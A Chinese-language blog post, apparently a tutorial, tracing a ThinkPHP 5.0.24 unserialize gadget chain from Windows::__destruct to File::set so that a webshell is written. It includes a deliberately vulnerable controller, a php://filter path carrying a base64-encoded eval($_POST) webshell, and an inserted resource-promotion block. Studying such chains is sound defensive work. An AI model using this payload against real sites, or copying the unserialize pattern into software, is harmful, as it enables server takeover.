浅析安全反序列化漏洞

一、概述

对于这个漏洞的学习，有几个大体的思路，一是向大佬学习；二是找到可以利用的点，再不断构造合理的对象向这个点靠近；三是把几个子链分别构造好再连起来。

另外，查到的资料说这个漏洞并不是适用于所有的TP5.0.X版本，这里为了不产生歧义，只记成TP5.0.24版本。

二、分析

（一）环境搭建

Windows、PHPStudy(PHP5.6)、ThinkPHP5.0.24；

首先安装此版本的ThinkPHP，

composer create-project topthink/think tp 5.0.24

index controller改为

class Index
{
    public function index()
    {
        @unserialize($_GET['k']);
    }
}

调用栈如下，

File.php:160, think\cache\driver\File->set()
Memcache.php:94, think\session\driver\Memcache->write()
Output.php:154, think\console\Output->write()
Output.php:143, think\console\Output->writeln()
Output.php:124, think\console\Output->block()
Output.php:212, call_user_func_array()
Output.php:212, think\console\Output->__call()
Model.php:912, think\console\Output->getAttr()
Model.php:912, think\Model->toArray()
Model.php:936, think\Model->toJson()
Model.php:2267, think\Model->__toString()
Windows.php:163, file_exists()
Windows.php:163, think\process\pipes\Windows->removeFiles()
Windows.php:59, think\process\pipes\Windows->__destruct()
App.php:8, app\index\controller\Index->index()

（二）分析与调试

分为几个部分进行分析。

1.从Windows.removeFiles()到Model.toArray()

从Windows的__destruct开始看，

image.png

【一>所有资源获取<一】
1、电子书籍（白帽子）
2、安全大厂内部视频
3、100份src文档
4、常见安全面试题
5、ctf大赛经典题目解析
6、全套工具包
7、应急响应笔记
8、网络安全学习路线

close()中没有可以直接使用的点，removeFiless()中有file_exists()的判断，如果file_exists()的参数是一个对象，则会调用其对应类的__toString()方法，

image.png

think\Model中有很好的__toString()方法，其中调用了toJson，toJson中调用了toArray。

image.png

这里需要注意，Model是个抽象类，没法直接从抽象类创建对象，它的意义在于被扩展，

image.png

经过搜索，可以选择Pivot与Merge两个类作为具体实现，选择哪一个对主干不会产生太大影响，但会对PoC的写法产生细微差别（个别字段的public与private属性），这里先选择Merge。

进入Model.toArray之后，就该考虑如何进一步调用到Output.__call()。

2.从Model.toArray到Output.__call()

从Model的toArray中，我们可以看到有若干个疑似可以利用的点，选择不同的触发点会对整个流程产生一定影响。此处选择$item[$key] = $value ? $value->getAttr($attr) : null;这一点。

image.png

接下来遇到一个很现实的问题，就是找到了这个点之后，怎么在$value有意义的前提下，保证程序可以在前面的若干行代码中不出错，进而顺利正常抵达这里。

（1）进入else

首先最高级的if和内部的大else前面的if和elseif较为直接，要求如下：name不可为数组，this->append数组，而这个数组是我们可控的，则对应的name也都可控，故这里可以较为容易的走过。这一部分可以简单走过，重要的是else之中的隐藏的阻碍。

（2）parseName与进入if (method_exists(relation))

首先跟进看Loader::parseName($name, 1, false);

image.png

功能是字符串命名风格转换，应该来讲没什么影响，name直接划等号。

接下来看如何使method_exists(relation)这一条件为true，这要求我们找一个Model或其子类中存在的方法名，由此可见，上一小步中的$this->append不能随意构造，应该放入一个合适的方法名。

（3）getRelationData

image

可以看到，在判断relation函数后，便会调用这个函数，赋值给this->getRelationData(value，item[value ? attr) : null;`这关键一行中发挥作用，这就要求我们找到一个具有优良性质的函数来串起这一切。

Model类中的getError方法具有逻辑简单、返回值直接可控的性质，没有比这个函数还好用的函数了，也许选别的也可以，但选这个准没错。

image.png

我们将this->error的值可根据需要再行设定。

跟进看下一行的$value = $this->getRelationData($modelRelation);，

image.png

有一个比较严苛的条件if ($this->parent && !$modelRelation->isSelfRelation() && get_class($modelRelation->getModel()) == get_class($this->parent))。

首先modelRelation->isSelfRelation()的返回值不为空，最后还有一个类型比较。

若想研究isSelfRelation()和getModel()这两个方法，得先保证modelRelation实质上是this->error的值便依此而定。

image.png

经过搜索发现，Relation类中有这两个方法的定义，但是和Model一样，Relation是个抽象类，我们需要寻找它的可用的子类。

看看另外两个函数。

image.png

其一返回Model的selfRelation，由于要加上逻辑否，这里设置为false即可；其二最终返回了this->query->model和this->error要是Relation的子类，this->parent决定这两点。

（4）method_exists($modelRelation, ‘getBindAttr’)

这算得上是这一子链的较为关键的一部分，

image.png

要想进入红色的触发点，必须保证bindAttr要具有一定的性质。

上面提到this->error，是我们可控的，且要是Relation的子类，

image.png

我们搜索发现，只有OnetoOne类中定义了getBindAttr()方法，

image.png

且查看后发现，此类是继承了Relation的抽象类，可以满足此一步和上一步的要求。

接下来要做的是找一个合适的OneToOne的子类。全局搜索，找到如下两个，

image.png

经过查看，这两个的相关属性和方法几乎一模一样，选择哪个应该都可以，只是PoC写的时候有所区分，这里选择HasOne。

由刚才的分析，我们知道，这一段中有两个举足轻重的变量：modelRelation）和this->error上，至于触发点处的this->value必须为Output对象，

image.png

且由getRelationData()知，$this->parent应为Output对象。

因为还要过get_class($modelRelation->getModel()) == get_class($this->parent)这一道障碍，this->parent一样，是Output对象。class Query中天然带着this->query，其$model属性应为Output对象。

image.png

(5)$modelRelation->getBindAttr()

接下来要研究的是modelRelation->getBindAttr();这一句。

image.png

跟进可见，这一函数功能也是非常简单直接，我们可以直接控制$this->bindAttr为我们想要的对象。

image.png

首先this->data直接为空即可保证能够进入else即可，这里重要的是attr是何值，只要能够触发Output->getAttr($attr)就会去调用__call方法，就能进入下面的环节了。

3.从Output.__call()到Memcached.write()

跟进Output.__call()，

image.png

在简单构造args)`，调用block方法，

image.png

接下来能否成功利用，就看Output的$this->handle->write了。

首先Output.handle是可控的，我们要找一个带有合适的write()方法的类。

搜索一下，发现了数个定义有write的类，

image.png

从中有没有比较合适的呢，经过学习可知，我们可以选择think\session\driver\Memcached 类。Memcached的write() 中调用了 this->handler可控，再加上think\cache\driver\File中的set() 方法可以写文件，故而选择Memcached。

$data   = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
$result = file_put_contents($filename, $data);

4.Memcached.write()->File.set()

但当仔细观察时，我们会发现这个思路其实是存疑的：此处可以写入文件不假，但是否可以写入webshell有待考证，因为这里的$data未必是可控的。

image.png

向上找data的值为定值true，这样一来，如果没有进一步方案，写入shell的想法就会失败。

这时如果我们接着往下看，会看到一句$this->setTagItem($filename)的代码，其将文件名name)，

image.png

可以看到此处将value，又调用了一次$this->set()方法，也就是说，如果文件名构造得当，还是有机会写入webshell的。

而$filename的值是由getCacheKey产生的，跟进之。

image.png

可以看到，这个函数相对友好，有一个md5哈希操作和一个与$this->options[‘path’]的拼接操作，在一定条件下，最终的$filename基本上是可控可知的。但是要注意到$data是由$data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;这样一句产生的，应想办法解决掉这个exit()，另外如果是在Windows环境下写文件还需要将一些特殊符号转化掉，这里就涉及到一个较为深入的知识点了。令$this->options['path']为'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWycxJ10pOz8+/../a.php',。

image.png

如此，在第一次进入set()时，我们生成了一个文件名为

php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWycxJ10pOz8+/../a.phpc9a7cef7c410e3ea21c4287f392fd663.php，

内容为

<?php //000000000000 exit();?> b:1;的文件，

第二次由setTagItem($filename)进入set()，才是生成webshell的关键一步。

文件名为$this->options['path'].md5('tag_' . md5($this->tag)).'.php'即php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWycxJ10pOz8+/../a.php3b58a9545013e88c7186db11bb158c44.php的文件，其内容为<?php //000000000000 exit();?> s:154:"php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWycxJ10pOz8+/../a.phpc9a7cef7c410e3ea21c4287f392fd663.php";。

在过滤器的作用下，将写出webshell。

image.png

最后发送个想要的POST包即可。

image.png